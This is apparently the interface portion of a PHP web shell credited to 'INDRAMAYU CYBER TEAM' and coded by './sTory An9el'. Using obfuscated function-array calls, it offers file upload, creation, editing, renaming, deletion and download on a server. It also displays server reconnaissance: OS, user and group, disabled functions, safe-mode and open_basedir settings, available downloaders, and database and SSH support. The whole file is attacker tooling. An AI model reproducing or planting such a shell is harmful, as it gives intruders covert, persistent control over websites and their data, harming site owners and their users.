				<a href="?" class="m-1 btn btn-outline-dark btn-sm"><i class="fa fa-home"></i> Home</a>
				<a class="m-1 btn btn-outline-dark btn-sm" data-bs-toggle="collapse" href="#upload" role="button" aria-expanded="false" aria-controls="collapseExample"><i class="fa fa-upload"></i> Upload</a>
				<a class="m-1 btn btn-outline-dark btn-sm" data-bs-toggle="collapse" href="#newfile" role="button" aria-expanded="false" aria-controls="collapseExample"><i class="fa fa-file-plus"></i> New File</a>
				<a class="m-1 btn btn-outline-dark btn-sm" data-bs-toggle="collapse" href="#newfolder" role="button" aria-expanded="false" aria-controls="collapseExample"><i class="fa fa-folder-plus"></i> New Folder</a>
			</div>
			
			<div class="row">
				<div class="col-md-12">
					<div class="collapse" id="upload" data-bs-parent="#tool">
						<div class="card card-body border-dark mb-3">
							<div class="row">
								 <div class="col-md-6">
									<form action="" method="post" enctype="multipart/form-data">
										<div class="input-group">
											<input type="file" class="form-control" name="uploadfile[]" id="inputGroupFile04" aria-describedby="inputGroupFileAddon04" aria-label="Upload">
											<button class="btn btn-outline-dark" type="submit" id="inputGroupFileAddon04">Upload</button>
										</div>
									</form>
								 </div>
							</div>
						</div>
					</div>
				</div>
				<div class="col-md-12">
					<div class="collapse" id="newfile" data-bs-parent="#tool">
						<div class="card card-body border-dark mb-3">
							<div class="row">
								<div class="col-md-6">
									<form action="" method="post">
										<div class="mb-3">
											<label class="form-label">File Name</label>
											<input type="text" class="form-control" name="filename" placeholder="./sToryAn9el.txt">
										</div>
										<div class="mb-3">
											<label class="form-label">File Content</label>
											<textarea class="form-control" rows="5" name="filecontent"></textarea>
										</div>
										<button type="submit" class="btn btn-outline-dark">Create</button>
									</form>
								</div>
							</div>
						</div>
					</div>
				</div>
				<div class="col-md-12">
					<div class="collapse" id="newfolder" data-bs-parent="#tool">
						<div class="card card-body border-dark mb-3">
							<div class="row">
								<div class="col-md-6">
									<form action="" method="post">
										<div class="mb-3">
											<label class="form-label">Folder Name</label>
											<input type="text" class="form-control" name="foldername" placeholder="./sToryAn9el">
										</div>
										<button type="submit" class="btn btn-outline-dark">Create</button>
									</form>
								</div>
							</div>
						</div>
					</div>
				</div>
			</div>
		</div>

		<div class="row">
			<div class="col-md-12">
				<div class="card border-dark">
					<div class="card-body">
						<h5><i class="fa fa-server"></i> Server Information </h5>
						<div class="table-responsive">
							<table class="table table-hover text-nowrap">
								<tr>
									<td>Operating System</td>
									<td> : <?= $uname ?></td>
								</tr>
								<tr>
									<td>User / Group</td>
									<td> : <?= $uid ?>[<?= $user ?>] / <?= $gid ?>[<?= $group ?>]</td>
								</tr>
								<tr>
									<td>PHP Version</td>
									<td> : <?= $func[1]() ?></td>
								</tr>
								<tr>
									<td>IP Server</td>
									<td> : <?= (!@$_SERVER["SERVER_ADDR"] ? ($func[49]("gethostbyname") ? @gethostbyname($_SERVER['SERVER_NAME']) : '????') : @$_SERVER["SERVER_ADDR"]) ?></td>
								</tr>
								<tr>
									<td>Storage</td>
									<td class="d-flex">: Total = <?= formatSize($total) ?>, Free = <?= formatSize($free) ?> [<?= $pers ?>%]</td>
								</tr>
								<tr>
									<td>Domains</td>
									<td>: <?= $dom ?></td>
								</tr>
								<tr>
									<td>Software</td>
									<td>: <?= $_SERVER['SERVER_SOFTWARE'] ?></td>
								</tr>
								<tr>
									<td>Disable Functions</td>
									<td>: <?= $show_ds ?></td>
								</tr>
								<tr>
									<td>Useful Functions</td>
									<td>: <?= rtrim($useful, ', ') ?></td>
								</tr>
								<tr>
									<td>Downloader</td>
									<td>: <?= rtrim($downloader, ', ') ?></td>
								</tr>
								<tr>
									<td colspan="2">CURL : <?= $func[49]('curl_version') ? '<font class="text-success">ON</font>' : '<font class="text-danger">OFF</font>' ?> | SSH2 : <?= $func[49]('ssh2_connect') ? '<font class="text-success">ON</font>' : '<font class="text-danger">OFF</font>' ?> | Magic Quotes : <?= $func[49]('get_magic_quotes_gpc') ? '<font class="text-success">ON</font>' : '<font class="text-danger">OFF</font>' ?> | MySQL : <?= $func[49]('mysql_get_client_info') || class_exists('mysqli') ? '<font class="text-success">ON</font>' : '<font class="text-danger">OFF</font>' ?> | MSSQL : <?= $func[49]('mssql_connect') ? '<font class="text-success">ON</font>' : '<font class="text-danger">OFF</font>' ?> | PostgreSQL : <?= $func[49]('pg_connect') ? '<font class="text-success">ON</font>' : '<font class="text-danger">OFF</font>' ?> | Oracle : <?= $func[49]('oci_connect') ? '<font class="text-success">ON</font>' : '<font class="text-danger">OFF</font>' ?></td>
								</tr>
								<tr>
									<td colspan="2">Safe Mode : <?= @$func[31]('safe_mode') ? '<font class="text-success">ON</font>' : '<font class="text-danger">OFF</font>' ?> | Open Basedir : <?= $open_b ?> | Safe Mode Exec Dir : <?= @$func[31]('safe_mode_exec_dir') ? '<font class="text-success">'. @$func[31]('safe_mode_exec_dir') .'</font>' : '<font class="text-warning">NONE</font>' ?> | Safe Mode Include Dir : <?= @$func[31]('safe_mode_include_dir') ? '<font class="text-success">'. @$func[31]('safe_mode_include_dir') .'</font>' : '<font class="text-warning">NONE</font>' ?></td>
								</tr>
							</table>
						</div>
					</div>
				</div>
			</div>
			<div class="col-md-12 my-3">
				<div class="card border-dark">
					<div class="card-body">
						<h5><i class="fa fa-wave-square"></i> Path </h5>
						<nav aria-label="breadcrumb" style="--bs-breadcrumb-divider: '>';">
							<ol class="breadcrumb">
								<?php
									$numDir = count($scdir);
									foreach ($scdir as $id => $pat) {
										if ($pat == '' && $id == 0) {
											echo '<li class="breadcrumb-item"><a class="text-decoration-none text-dark" href="?dir=/">/</a></li>';
											continue;
										}
										if ($pat == '') continue;
										if ($id + 1 == $numDir) {
											echo '<li class="breadcrumb-item active" aria-current="page">'.$pat.'</li>';
										} else {
											echo '<li class="breadcrumb-item"><a class="text-decoration-none text-dark" href="?dir=';
											for ($i = 0; $i <= $id; $i++) {
												echo "$scdir[$i]";
												if ($i != $id) echo "/";
											}
											echo '">'.$pat.'</a></li>';
										}
									}
								?>
							</ol>
						</nav>
						[ <?= checkPerm($dir, perms($dir)) ?> ]
					</div>
				</div>
			</div>
			<div class="col-md-12" id="main">
				<div class="card border-dark overflow-auto">
					<div class="card-body">
						<h5><i class="fa fa-<?= $icon ?>"></i> <?= $title ?></h5>
						<?php if ($do == 'view') : ?>
							<h1>Anjing</h1>
						<?php else: ?>
							<?php if ($func[9]($dir)) : ?>
								<div class="table-responsive">
									<table class="table table-hover text-nowrap">
										<thead>
											<tr>
												<th>Name</th>
												<th>Type</th>
												<th>Size</th>
												<th>Last Modified</th>
												<th>Owner/Group</th>
												<th>Permission</th>
												<th>Action</th>
											</tr>
										</thead>
										<tbody>
											<?php
												foreach ($scandir as $item) :
													if (!$func[6]($dir . '/' . $item)) continue;
											?>
												<tr>
													<td>
														<?php if ($item === '..') : ?>
														<a href="?dir=<?= $func[28]($dir); ?>" class="text-decoration-none text-dark"><i class="fa fa-folder-open"></i> <?= $item ?></a>
														<?php elseif ($item === '.') :  ?>
														<a href="?dir=<?= $dir; ?>" class="text-decoration-none text-dark"><i class="fa fa-folder-open"></i> <?= $item ?></a>
														<?php else : ?>
														<a href="?dir=<?= $dir . '/' . $item ?>" class="text-decoration-none text-dark"><i class="fa fa-folder"></i> <?= checkName($item); ?></a>
														<?php endif; ?>
													</td>
													<td><?= $func[38]($item) ?></td>
													<td class="align-middle">--</td>
													<td><?= $func[19]("Y-m-d h:i:s", $func[20]($item)); ?></td>
													<td><?= getowner($item) ?></td>
													<td><?= checkPerm($dir . '/' . $item, perms($dir . '/' . $item))  ?></td>
													<td>
														<button type="button" class="btn btn-outline-dark btn-sm mr-1" <?= $item === ".." || $item === "." ? '' : 'data-bs-toggle="modal" data-bs-target="#renameModal" data-bs-name="'.$item.'"' ?>><i class="fa fa-edit"></i></button>
														<button type="button" class="btn btn-outline-dark btn-sm mr-1" <?= $item === ".." || $item === "." ? '' : 'data-bs-toggle="modal" data-bs-target="#deleteModal" data-bs-file="'.$dir . '/' . $item.'"'?>><i class="fa fa-trash-alt"></i></button>
													</td>
												</tr>
											<?php endforeach; ?>
											<?php
												foreach ($scandir as $item) :
													if (!$func[7]($dir . '/' . $item)) continue;
											?>
												<tr>
													<td><a data-bs-toggle="modal" href="#viewModal" role="button" data-bs-name="<?= $item ?>" data-bs-content="<?= $func[18](@$func[14]($item)) ?>" class="text-dark text-decoration-none"><i class="fa fa-<?= geticon($item) ?>"></i> <?= checkName($item); ?></a></td>
													<td><?= checkName(($func[49]('mime_content_type') ? $func[63]($item) : $func[38]($item))) ?></td>
													<td><?= formatSize($func[10]($item)) ?></td>
													<td><?= $func[19]("Y-m-d h:i:s", $func[20]($item)); ?></td>
													<td><?= getowner($item) ?></td>
													<td><?= checkPerm($dir . '/' . $item, perms($dir . '/' . $item))  ?></td>
													<td>
														<button type="button" class="btn btn-outline-dark btn-sm mr-1" data-bs-toggle="modal" data-bs-target="#renameModal" data-bs-name="<?= $item ?>"><i class="fa fa-edit"></i></button>
														<button type="button" class="btn btn-outline-dark btn-sm mr-1" data-bs-toggle="modal" data-bs-target="#viewModal" data-bs-name="<?= $item ?>" data-bs-content="<?= $func[18](@$func[14]($item)) ?>"><i class="fa fa-file-signature"></i></button>
														<button type="button" class="btn btn-outline-dark btn-sm mr-1" data-bs-toggle="modal" data-bs-target="#downloadModal" data-bs-file="<?= $dir . '/' . $item ?>"><i class="fa fa-download"></i></button>
														<button type="button" class="btn btn-outline-dark btn-sm mr-1" data-bs-toggle="modal" data-bs-target="#deleteModal" data-bs-file="<?= $dir . '/' . $item ?>"><i class="fa fa-trash-alt"></i></button>
													</td>
												</tr>
											<?php endforeach; ?>
										</tbody>
									</table>
								</div>
							<?php else: ?>
								<font class="text-danger">Can't read this directory!</font>
							<?php endif; ?>
						<?php endif; ?>
					</div>
				</div>
			</div>
			<div class="col-md-12 my-3">
				<div class="card border-dark">
					<div class="card-body">
						Copyright © <a href="https://imcyber-team.blogspot.com/"><font size="1"><b>INDRAMAYU CYBER TEAM</b></font></a> <span class="float-end">Coded by <span class="text-muted">./sTory An9el </span></span>
					</div>
				</div>
			</div>
		</div>
	</div>
	
	<div class="modal fade" id="renameModal" data-bs-backdrop="static" data-bs-keyboard="false" tabindex="-1" aria-labelledby="renameModalLabel" aria-hidden="true">
	  <div class="modal-dialog modal-dialog-centered">
	    <div class="modal-content">
	      <div class="modal-header">
	        <h5 class="modal-title" id="renameModalLabel">Rename</h5>
	        <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
	      </div>
	      <form method="post" id="rename-form">
		      <div class="modal-body">
		          <div class="mb-3">
		            <label for="newname" class="col-form-label">New Name:</label>
		            <input type="text" class="form-control" name="newname" id="newname">
		          </div>
		      </div>
		      <div class="modal-footer">
		        <button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Close</button>
		        <button type="submit" class="btn btn-primary">Rename</button>
		      </div>
        </form>
	    </div>
	  </div>
	</div>
	
	<div class="modal fade" id="deleteModal" aria-hidden="true" aria-labelledby="deleteModalToggleLabel2" data-bs-backdrop="static" data-bs-keyboard="false" tabindex="-1">
	  <div class="modal-dialog modal-dialog-centered">
	    <div class="modal-content">
	      <div class="modal-header">
	        <h5 class="modal-title" id="exampleModalToggleLabel2">Delete</h5>
	        <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
	      </div>
	      <div class="modal-body">
	        Are you sure want to delete this?
	      </div>
	      <div class="modal-footer">
	        <button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Close</button>
	        <a href="" class="btn btn-danger" id="delete-confirm">Delete</a>
	      </div>
	      
	    </div>
	  </div>
	</div>
	
	<div class="modal fade" id="downloadModal" aria-hidden="true" aria-labelledby="deleteModalToggleLabel2" data-bs-backdrop="static" data-bs-keyboard="false" tabindex="-1">
	  <div class="modal-dialog modal-dialog-centered">
	    <div class="modal-content">
	      <div class="modal-header">
	        <h5 class="modal-title" id="exampleModalToggleLabel2">Download</h5>
	        <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
	      </div>
	      <div class="modal-body">
	        Are you sure want to download this?
	      </div>
	      <div class="modal-footer">
	        <button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Close</button>
	        <a href="" class="btn btn-danger" id="download-confirm">Download</a>
	      </div>
	      
	    </div>
	  </div>
	</div>
	
	<div class="modal fade" id="viewModal" aria-hidden="true" aria-labelledby="deleteModalToggleLabel2" data-bs-backdrop="static" data-bs-keyboard="false" tabindex="-1">
	  <div class="modal-dialog modal-dialog-centered">
	    <div class="modal-content">
	      <div class="modal-header">
	        <h5 class="modal-title" id="exampleModalToggleLabel2">View</h5>
	        <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
	      </div>
	      <form action="" method="post">
		      <div class="modal-body">
		        <div class="mb-3">
	            <label for="content" class="col-form-label">Content:</label>
	            <textarea class="form-control" id="content" rows="15" name="content"></textarea>
	          </div>
		      </div>
		      <div class="modal-footer">
		        <button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Close</button>
		        <button type="submit" class="btn btn-primary">Save</button>
		      </div>
	      </form>
	    </div>
	  </div>
	</div>
	
	<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.1/dist/js/bootstrap.bundle.min.js" integrity="sha384-gtEjrD/SeCtmISkJkNUaaKMoLD0//ElJ19smozuHV6z3Iehds+3Ulb9Bn9Plx0x4" crossorigin="anonymous"></script>
	<script src="https://code.jquery.com/jquery-3.6.0.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script>
	<script>
		var renameModal = document.getElementById('renameModal')
		var deleteModal = document.getElementById('deleteModal')
		var viewModal = document.getElementById('viewModal')
		var downloadModal = document.getElementById('downloadModal')
		
		renameModal.addEventListener('show.bs.modal', function (event) {
			var button = event.relatedTarget
			var name = button.getAttribute('data-bs-name')
			var modalTitle = renameModal.querySelector('.modal-title')
			var modalBodyInput = renameModal.querySelector('.modal-body input')
			var hiddenInput = document.createElement('input')
			hiddenInput.type = "hidden";
			hiddenInput.value = name;
			hiddenInput.name = "oldname";
			document.getElementById("rename-form").appendChild(hiddenInput);
			
			modalBodyInput.value = name
		})
		
		deleteModal.addEventListener('show.bs.modal', function (event) {
			var button = event.relatedTarget
			var file = button.getAttribute('data-bs-file')
			var deleteConfirm = document.getElementById('delete-confirm')
			deleteConfirm.href = '?dir=' + file + '&do=delete'
		})
		
		downloadModal.addEventListener('show.bs.modal', function (event) {
			var button = event.relatedTarget
			var file = button.getAttribute('data-bs-file')
			var downloadConfirm = document.getElementById('download-confirm')
			downloadConfirm.href = '?dir=' + file + '&do=download'
		})
		
		viewModal.addEventListener('show.bs.modal', function (event) {
			var button = event.relatedTarget
			var content = button.getAttribute('data-bs-content')
			var name = button.getAttribute('data-bs-name')
			var modalTitle = viewModal.querySelector('.modal-title')
			var modalContent = viewModal.querySelector('.modal-body textarea')
			var hiddenInput = document.createElement('input')
			hiddenInput.type = "hidden";
			hiddenInput.value = name;
			hiddenInput.name = "filename";
			viewModal.querySelector("form").appendChild(hiddenInput);

			modalTitle.textContent = 'Edit ' + name
			modalContent.value = content
		})
	</script>
</body>
</html>